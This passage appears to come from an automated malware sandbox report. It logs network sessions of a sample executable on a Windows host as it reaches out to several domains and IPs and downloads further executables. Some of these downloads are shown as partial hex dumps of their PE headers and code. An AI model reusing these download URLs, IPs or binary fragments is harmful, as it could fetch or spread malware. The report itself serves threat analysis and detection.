Mar 28, 2024 09:14:58.667639017 CET	761	IN	HTTP/1.1 200 OK Date: Thu, 28 Mar 2024 08:14:58 GMT Content-Type: application/octet-stream Content-Length: 1945878 Connection: keep-alive Content-Description: File Transfer Content-Disposition: attachment; filename=june.exe Content-Transfer-Encoding: binary Expires: 0 Cache-Control: must-revalidate Pragma: public CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wW%2BkLK427WI0BC3s%2FV%2FaftjYYh9gUU2zVyJ4h819k7eN4x1b4EDfejAGCypevuos2iuXXk55wqezFuVEVc07HCUyX8KLe%2Fq%2BsBsALkxN80DwLeooTucq8SnK6kbBENnBcUbY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86b62b6f2a002064-IAD alt-svc: h3=":443"; ma=86400
Mar 28, 2024 09:14:58.668072939 CET	209	OUT	GET /data/pdf/june.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: act.fishoaks.net Cache-Control: no-cache
Mar 28, 2024 09:14:58.861124039 CET	1286	IN	HTTP/1.1 200 OK Date: Thu, 28 Mar 2024 08:14:58 GMT Content-Type: application/octet-stream Content-Length: 1945878 Connection: keep-alive Content-Description: File Transfer Content-Disposition: attachment; filename=june.exe Content-Transfer-Encoding: binary Expires: 0 Cache-Control: must-revalidate Pragma: public CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YTsUVFM5EJWHQiYNHU%2FstVov3K6yFA5pAvb7Y7WF1f23Ypst2ka%2FxhYUde%2B24y%2BO%2FwB8dYVDm3UTlzVEbO8QovR1CuSJWSIBZ0M40Mr4ddafGCf%2BRL%2FE%2FFgXM%2B0atn2l1ABi"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86b62b70fbc32064-IAD alt-svc: h3=":443"; ma=86400 Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8f 81 0b 01 02 19 00 94 00 00 00 46 00 00 00 00 00 00 24 9b 00 00 00 10 00 00 00 b0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 01 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 50 09 00 00 00 10 01 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 44 92 00 00 00 Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*F$@@@P,CODED
Mar 28, 2024 09:14:58.861140966 CET	1286	IN	Data Raw: 10 00 00 00 94 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 4c 02 00 00 00 b0 00 00 00 04 00 00 00 98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 48 0e 00 00 00 c0 00 Data Ascii: `DATAL@BSSH.idataP@.tls.rdata@P.reloc
Mar 28, 2024 09:14:58.861155033 CET	1286	IN	Data Raw: 42 04 89 03 b0 01 5e 5b c3 8b 50 04 8b 08 89 0a 89 51 04 8b 15 38 c4 40 00 89 10 a3 38 c4 40 00 c3 53 56 57 55 51 8b f1 89 14 24 8b e8 8b 5d 00 8b 04 24 8b 10 89 16 8b 50 04 89 56 04 8b 3b 8b 43 08 8b d0 03 53 0c 3b 16 75 14 8b c3 e8 b7 ff ff ff Data Ascii: B^[PQ8@8@SVWUQ$]$PV;CS;uCCFV;uCF;uUu3Z]_^[@SVWU2C;rlJk;w^;uBCB)C{uD5;r{;u)s&J$
Mar 28, 2024 09:14:58.861167908 CET	1286	IN	Data Raw: e8 16 fb ff ff 83 7c 24 0c 00 0f 85 66 ff ff ff 8d 4c 24 0c 8b 54 24 08 8b 44 24 04 e8 da fc ff ff 8b 04 24 33 d2 89 10 eb 48 8b 6b 08 3b f5 75 3a 3b 7b 0c 7f 35 8b 0c 24 8b d7 8b c5 e8 71 fd ff ff 8b 04 24 83 38 00 74 28 8b 04 24 8b 40 04 01 43 Data Ascii: \|$fL$T$D$$3Hk;u:;{5$q$8t($@C$@)C{u$3]_^[SVW$?4$;s[+L$L@]\$tL$T$&D$D$D$D$\|$tT$L
Mar 28, 2024 09:14:58.861181021 CET	1286	IN	Data Raw: fe 00 10 00 00 7f 30 8b d6 c1 ea 02 a1 74 c4 40 00 8b 44 90 f4 85 c0 75 10 a1 74 c4 40 00 89 5c 90 f4 89 5b 04 89 1b eb 3a 8b 10 89 43 04 89 13 89 18 89 5a 04 eb 2c 81 fe 00 3c 00 00 7c 0d 8b d6 8b c7 e8 09 ff ff ff 84 c0 75 17 a1 68 c4 40 00 89 Data Ascii: 0t@Dut@\[:CZ,<\|uh@h@CZ_^[=l@~@=l@}@+l@p@p@3p@3l@SVW<$L$x@<\$u3R;s)
Mar 28, 2024 09:14:58.861203909 CET	1286	IN	Data Raw: 00 0a 00 00 00 e9 9e 00 00 00 03 da 8b f0 e8 90 f8 ff ff 81 e3 fc ff ff 7f 8b c6 03 c3 8b f8 3b 3d 70 c4 40 00 75 2c 29 1d 70 c4 40 00 01 1d 6c c4 40 00 81 3d 6c c4 40 00 00 3c 00 00 7e 05 e8 1f fb ff ff 33 c0 89 45 fc e8 e9 0c 00 00 e9 85 00 00 Data Ascii: ;=p@u,)p@l@=l@<~3Et}@7)xt8tx}@P;@E3ZYYdh"@=2@th@E_^[Y]SVWU
Mar 28, 2024 09:14:58.861222982 CET	1286	IN	Data Raw: 04 8b 5a 04 39 d9 75 38 83 c0 08 83 c2 08 4e 75 e2 eb 06 83 c0 04 83 c2 04 5e 83 e6 03 74 36 8a 08 3a 0a 75 30 4e 74 13 8a 48 01 3a 4a 01 75 25 4e 74 08 8a 48 02 3a 4a 02 75 1a 31 c0 5e 5b c3 5e 38 d9 75 10 38 fd 75 0c c1 e9 10 c1 eb 10 38 d9 75 Data Ascii: Z9u8Nu^t6:u0NtH:Ju%NtH:Ju1^[^8u8u8u8^[Wfx_i,@B,@SVWPtQ11F t-tE+tB$tBt20w*9w&Fut\|Y12_^[F~
Mar 28, 2024 09:14:58.861253023 CET	1286	IN	Data Raw: fc ff ff 8b 15 0c c0 40 00 85 d2 0f 84 8b 00 00 00 ff d2 85 c0 0f 84 81 00 00 00 8b 54 24 0c e8 db fe ff ff 89 c2 8b 44 24 04 8b 48 0c 83 48 04 02 53 31 db 56 57 55 64 8b 1b 53 50 52 51 8b 54 24 28 6a 00 50 68 79 2c 40 00 52 e8 53 e5 ff ff 8b 7c Data Ascii: @T$D$HHS1VWUdSPRQT$(jPhy,@RS\|$(o_G,@RA_D$@8tr@u@T$SVWUJYq
Mar 28, 2024 09:14:58.861284018 CET	1286	IN	Data Raw: db 75 0c b8 e2 00 00 00 e8 05 0d 00 00 eb 0c 53 a1 d0 c3 40 00 50 e8 ca e0 ff ff 89 1d 8c c4 40 00 5b c3 8b c0 8a 0d 30 c0 40 00 8b 05 d0 c3 40 00 84 c9 75 28 64 8b 15 2c 00 00 00 8b 04 82 c3 e8 98 ff ff ff 8b 05 d0 c3 40 00 50 e8 8c e0 ff ff 85 Data Ascii: uS@P@[0@@u(d,@Pt@PzttJI\|JuBSVtJI\|JuBNu^[t#JAPRBXXRH\|ZXJtJI\|JuB
Mar 28, 2024 09:14:58.861296892 CET	1286	IN	Data Raw: 6a 00 6a 00 68 00 08 00 00 8d 44 24 0c 50 53 57 6a 00 6a 00 e8 ce db ff ff 8b c8 8b d4 8b c6 e8 1f fc ff ff eb 33 6a 00 6a 00 6a 00 6a 00 53 57 6a 00 6a 00 e8 ae db ff ff 8b e8 8b c6 8b cd 33 d2 e8 fd fb ff ff 6a 00 6a 00 55 8b 06 50 53 57 6a 00 Data Ascii: jjhD$PSWjj3jjjjSWjj3jjUPSWjj]_^[@SVS]^[SVWU) =}+hD$PV'PjjPD$P"(jjVSjjUjUWVSjj
Mar 28, 2024 09:14:58.861344099 CET	1286	IN	Data Raw: ff 4e 04 6a 00 ff 36 e8 5d d6 ff ff 40 0f 84 c9 00 00 00 2d 81 00 00 00 73 02 33 c0 6a 00 6a 00 50 ff 36 e8 79 d6 ff ff 40 0f 84 ad 00 00 00 6a 00 8b d4 6a 00 52 68 80 00 00 00 8d 96 4c 01 00 00 52 ff 36 e8 40 d6 ff ff 5a 48 0f 85 8b 00 00 00 33 Data Ascii: Nj6]@-s3jjP6y@jjRhLR6@ZH3;sLLt@jj+P6/@tg6Hu]"F$O:@~tjjt;~t6tuF R:@3^6sFiFLH

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49744	104.21.36.53	80	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
Mar 28, 2024 09:14:58.384917021 CET	174	OUT	Data Raw: 16 03 03 00 a9 01 00 00 a5 03 03 66 05 27 01 46 26 a2 3e 72 2d 26 0e 10 5c 5b b9 fb bf ca 74 ba 1c 35 b3 6d 2c 30 90 2b 81 48 e5 00 00 26 c0 2c c0 2b c0 30 c0 2f c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c 00 35 00 2f Data Ascii: f'F&>r-&\[t5m,0+H&,+0/$#('=<5/Vcybervincent.com#
Mar 28, 2024 09:14:58.479137897 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Thu, 28 Mar 2024 08:14:58 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49745	172.67.180.119	80	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
Mar 28, 2024 09:14:58.389529943 CET	174	OUT	Data Raw: 16 03 03 00 a9 01 00 00 a5 03 03 66 05 27 01 b5 00 de 72 6d 9d 9e 7d 8f 77 aa 7e ea 2f 4d ad b2 25 86 80 4c 29 b3 ba bc 89 23 21 00 00 26 c0 2c c0 2b c0 30 c0 2f c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c 00 35 00 2f Data Ascii: f'rm}w~/M%L)#!&,+0/$#('=<5/Vtriedchicken.net#
Mar 28, 2024 09:14:58.483855009 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Thu, 28 Mar 2024 08:14:58 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49746	104.21.42.248	80	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
Mar 28, 2024 09:14:58.392756939 CET	205	OUT	HEAD /bjhgvfd HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 294anacamptometer.sbs Cache-Control: no-cache
Mar 28, 2024 09:14:58.732774019 CET	407	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 28 Mar 2024 08:14:58 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive Cache-Control: no-cache, no-store, must-revalidate Expires: Thu, 28 Mar 2024 08:14:58 GMT Location: https://294anacamptometer.sbs/bjhgvfd Vary: Accept-Encoding Access-Control-Allow-Origin: * CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 86b62b6f4ac37f56-IAD
Mar 28, 2024 09:14:59.596808910 CET	455	OUT	GET /bjhgvfd HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 294anacamptometer.sbs Cache-Control: no-cache Cookie: _subid=2os9o961spv0l; 3c8e6=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjMwMFwiOjE3MTE2MTM2OTl9LFwiY2FtcGFpZ25zXCI6e1wiMjVcIjoxNzExNjEzNjk5fSxcInRpbWVcIjoxNzExNjEzNjk5fSJ9.KHqIfUeldGCGZRbbj7rLIdUk1MeFJ0AXBEcAv6r9p8Q
Mar 28, 2024 09:14:59.815315008 CET	440	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 28 Mar 2024 08:14:59 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Cache-Control: no-cache, no-store, must-revalidate Expires: Thu, 28 Mar 2024 08:14:59 GMT Location: https://294anacamptometer.sbs/bjhgvfd Vary: Accept-Encoding Access-Control-Allow-Origin: * CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 86b62b76c8017f56-IAD Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49736	5.42.66.22	80	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
Mar 28, 2024 09:14:58.404793024 CET	199	OUT	HEAD /getimage.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 5.42.66.22 Cache-Control: no-cache
Mar 28, 2024 09:14:58.623862982 CET	350	IN	HTTP/1.1 200 OK Server: nginx/1.22.0 Date: Thu, 28 Mar 2024 08:14:58 GMT Content-Type: application/octet-stream Content-Length: 5713216 Connection: keep-alive Content-Description: File Transfer Content-Disposition: attachment; filename=Arab.exe Content-Transfer-Encoding: binary Expires: 0 Cache-Control: must-revalidate Pragma: public
Mar 28, 2024 09:14:58.624111891 CET	196	OUT	GET /retail.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 5.42.66.22 Cache-Control: no-cache
Mar 28, 2024 09:14:58.842612028 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.22.0 Date: Thu, 28 Mar 2024 08:14:58 GMT Content-Type: application/octet-stream Content-Length: 5655872 Connection: keep-alive Content-Description: File Transfer Content-Disposition: attachment; filename=Retailer.exe Content-Transfer-Encoding: binary Expires: 0 Cache-Control: must-revalidate Pragma: public Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 ae 62 fd 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 22 00 d4 10 00 00 80 03 00 00 00 00 00 f5 3a 91 00 00 10 00 00 00 f0 10 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 98 00 00 04 00 00 b5 1b 57 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 5c f5 63 00 4a 00 00 00 fc c7 47 00 40 01 00 00 00 f0 97 00 1b 11 00 00 00 00 00 00 00 00 00 00 00 d0 55 00 40 7d 00 00 00 d0 97 00 ac 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 bf 97 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 42 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 d2 10 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d8 3c 02 00 00 f0 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c0 48 00 00 00 30 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 76 6d 70 c2 b3 c2 bb 7b 90 2e 00 00 80 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 76 6d 70 c2 b3 c2 bb 04 07 00 00 00 20 42 00 00 08 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 76 6d 70 c2 b3 c2 bb 20 94 55 00 00 30 42 00 00 96 55 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 65 6c 6f 63 00 00 ac 1a 00 00 00 d0 97 00 00 1c 00 00 00 a2 55 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 1b 11 00 00 00 f0 97 00 00 12 00 00 00 be 55 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELbe":@W@\cJG@U@} @ B.textX `.rdata<@@.dataH0@.vmp{. `.vmp B@.vmp U0BU `.relocU@@.rsrcU@@
Mar 28, 2024 09:14:58.842617989 CET	1286	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: EL3N@EswQ'E{TcSpLXM`E.Y^T
Mar 28, 2024 09:14:58.857372046 CET	1286	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Mar 28, 2024 09:14:58.857400894 CET	1286	IN	Data Raw: e9 83 a1 76 83 2c 56 ca 8d 2e ec f7 4c 58 c0 9c 9d bc 17 aa 65 ac 1a 1b ee 6b 9a 06 9e 34 86 8e 16 fe 39 8d 8a 82 b2 4f bd 1b b0 4d 12 6e 26 bf f6 d7 04 9d 61 8e ae f3 19 22 99 08 d5 7d 7c 89 25 08 99 1e e9 67 7c 8d 5d 68 bd 88 15 44 35 26 9b ee Data Ascii: v,V.LXek49OMn&a"}\|%g\|]hD5&_^x];WCZVde8ZyR2*_YFk@rEjgJ\3Pf9/Gf+t:hG=$m7@0^#F-6~/,xEX?oF,s&gFu
Mar 28, 2024 09:14:58.872050047 CET	1286	IN	Data Raw: fa 73 c5 34 f2 4f d3 a0 7f 97 30 2c 9e ff 76 cc d2 0b 71 cc c6 e8 7c bd c3 e1 28 4b e0 18 84 42 58 40 e7 2b 45 e3 46 99 19 2d 83 fd 79 63 69 07 22 35 14 4e 27 34 6f 04 0b c6 9a 3e 74 ea 99 5b 76 d0 b5 03 b3 66 27 d6 8a dc 7c 0d 0c 4a 4b f3 06 4d Data Ascii: s4O0,vq\|(KBX@+EF-yci"5N'4o>t[vf'\|JKMe,)Z5-d?6(L?EJmz>EoD-f\:j$G]?GMO:sDXZ^ED{Hwj8p2[{]iS86FBZj8C}8
Mar 28, 2024 09:14:58.872062922 CET	1286	IN	Data Raw: 65 91 65 19 10 26 51 22 6b 99 53 5b ca 4d 50 14 55 5d cc bf 7d ce 52 24 8b 96 d2 af ef df d7 5a 1d 07 fc c8 c0 4d fe 87 df de 17 2c 36 cd 01 66 c4 a5 82 a6 3b 66 71 19 82 52 f9 f3 63 fd 47 17 0f 87 57 2c 8a 24 f7 3f d0 dd 19 82 52 e9 0c c4 84 ab Data Ascii: ee&Q"kS[MPU]}R$ZM,6f;fqRcGW,$?RX>~;bgU]Ky<u#bjAutU]f\|_dh[R?BT!j@R9KqR)#rkbp6 @RI/Oh?tRyc!e<.L
Mar 28, 2024 09:14:58.886600971 CET	1286	IN	Data Raw: c0 4c 24 04 a3 66 41 d1 c4 e8 62 72 03 00 be ba 5e bb 26 0f bf ce 44 0f b7 d6 49 8b e0 41 52 51 ff 74 24 10 9d e9 1a 0a 19 00 0f 87 6f f5 0a 00 4d af de d7 d7 e1 ff 5c 53 3e a8 55 0c 24 95 c2 4d fe f9 e5 9a 76 86 be 57 e0 bf 0c 6b 77 18 e4 7c 51 Data Ascii: L$fAbr^&DIARQt$oM\S>U$MvWkw\|Qxk!>;(5txJ!\|LlWE"~K5m$/qK5mF[HNIm$J>\DF&m*-m$G}m-m"
Mar 28, 2024 09:14:58.886619091 CET	1286	IN	Data Raw: b4 58 b8 80 19 4f 01 a3 6d 60 a6 3a d2 fb eb bd d3 61 97 8a 74 e8 40 68 f9 8f f1 72 0d 9e b6 ce bf f8 29 5f a8 f8 81 da 38 3d 74 34 9f f6 63 67 f5 6f 70 9d f9 b4 1f e8 7e 16 97 84 1e 9f cf 9d 3c 2f cd 4c 94 c6 37 24 4e cf cf 9d 0c 1f 55 d4 e4 b6 Data Ascii: XOm`:at@hr)_8=t4cgop~</L7$NUO];@yOQ=!^:EsDmpY3,\|o&Zz(2!Kii;;B+H)j-(E`0v!S9Ub%G
Mar 28, 2024 09:14:58.901344061 CET	1286	IN	Data Raw: f4 fb e6 28 c5 94 22 50 4a 0b 89 83 37 a1 60 b0 9f c4 d8 b0 6a de d1 b9 1a a9 89 cf 00 eb 20 a8 8b e4 c8 6f dd 3b d4 b4 d3 5b 93 6c ff 67 44 14 a2 dc ae 63 04 89 7b 4c 7c 5a 8e d4 bd fd e1 13 09 a6 f1 08 d5 9b 19 5d 75 1f 0c 8d 8a 68 25 b7 d3 ae Data Ascii: ("PJ7`j o;[lgDc{L\|Z]uh%VE;Y4dB0Rh{L~P!:{L3Z.tUXO{LDzd%{LWJ{+H{L*hn7R{L=Mu"3D\Z
Mar 28, 2024 09:14:58.901369095 CET	1286	IN	Data Raw: 4e 1c 0d 6d 6b ea c5 1f 0c 38 c7 6e 45 c6 d5 c0 a2 43 14 c6 5e b0 81 43 c1 9b e6 ac dd 7b 5c 2b 9c c7 6e 45 c6 f5 2d 94 db 71 e6 6a cb 40 c0 4d 31 5e 1e 67 20 96 0e f8 5d ef ab 6e 45 c6 95 ec 2d a7 85 43 c4 ca da af bb 6a fe 1b 9b b0 6e 45 c6 b5 Data Ascii: Nmk8nEC^C{\+nE-qj@M1^g ]nE-CjnE4Sj%nEsho/LK/nEE:B6a@U.pP{`O^+X:!T?NQnEeLjjdnEC:1dnE5ymQg d@?Z3QI
Mar 28, 2024 09:14:58.915951967 CET	1286	IN	Data Raw: 31 dc f4 3a 7e 82 59 53 a8 59 a2 28 da e2 10 33 3b 51 11 27 2c 8f 85 77 e9 83 58 3d bc 54 e2 f8 30 2a 5f 53 09 49 4f 32 f5 ff e5 8b d1 0a 6f b9 c8 be e0 31 a2 c8 30 97 f3 53 da df f4 42 d8 da b5 02 3a b4 09 02 74 d9 30 7e 02 d0 da 8d c5 fe 40 86 Data Ascii: 1:~YSY(3;Q',wX=T0*_SIO2o10SB:t0~@:06u T^zsSCD4~vTc{lBB=~DusODe%6i%<>~eo}-b9cV]h~"`v>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49738	176.113.115.135	80	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
Mar 28, 2024 09:14:58.404901981 CET	196	OUT	HEAD /gyhu HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 176.113.115.135 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49740	93.186.225.194	80	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
Mar 28, 2024 09:14:58.487303019 CET	164	OUT	Data Raw: 16 03 03 00 9f 01 00 00 9b 03 03 66 05 27 01 05 06 be 59 32 2a ab 1f f0 27 c2 bc 8a 7a 43 69 4e 5f ea de 7d 6b 34 9f 62 5f ef 30 00 00 26 c0 2c c0 2b c0 30 c0 2f c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c 00 35 00 2f Data Ascii: f'Y2*'zCiN_}k4b_0&,+0/$#('=<5/Lvk.com#
